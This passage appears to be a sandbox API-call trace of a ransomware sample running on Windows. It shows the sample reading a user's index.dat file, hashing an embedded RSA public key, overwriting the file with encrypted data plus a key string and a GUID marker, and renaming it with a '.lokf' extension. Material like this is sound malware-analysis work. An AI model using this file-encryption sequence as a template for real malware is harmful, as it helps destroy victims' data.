cFileName="index.dat", cAlternateFileName="")) returned 1 [0061.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0061.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.252] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=32768) returned 1 [0061.252] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.255] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.255] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.256] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.256] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8000, lpOverlapped=0x0) returned 1 [0061.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.257] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.257] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b88b8) returned 1 [0061.257] CryptCreateHash (in: hProv=0x6b88b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.257] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.258] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.258] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.258] GetLastError () returned 0x0 [0061.258] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.258] CryptReleaseContext (hProv=0x6b88b8, dwFlags=0x0) returned 1 [0061.258] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.258] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.258] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.258] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86298 | out: hHeap=0x660000) returned 1 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862b0 | out: hHeap=0x660000) returned 1 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862b0 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86298 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x3245508 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862b0 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86298 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.259] GetCurrentThreadId () returned 0x9e0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c6d0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.259] GetCurrentThreadId () returned 0x9e0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86298 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862b0 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86280 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.260] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862c8 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86298 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86298 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245620 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86298 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0061.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245620 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862b0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86280 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86268 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86da0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.264] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x7ffb, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x7ffb, lpOverlapped=0x0) returned 1 [0061.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.264] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.264] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.264] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.264] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.264] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.264] CloseHandle (hObject=0x5cc) returned 1 [0061.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0061.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0061.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0061.266] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.lokf")) returned 1 [0061.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.267] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.268] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228d28 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x3201650 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262f18 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228f80 [0061.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3229048 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c809b0 | out: hHeap=0x660000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228eb8 | out: hHeap=0x660000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: 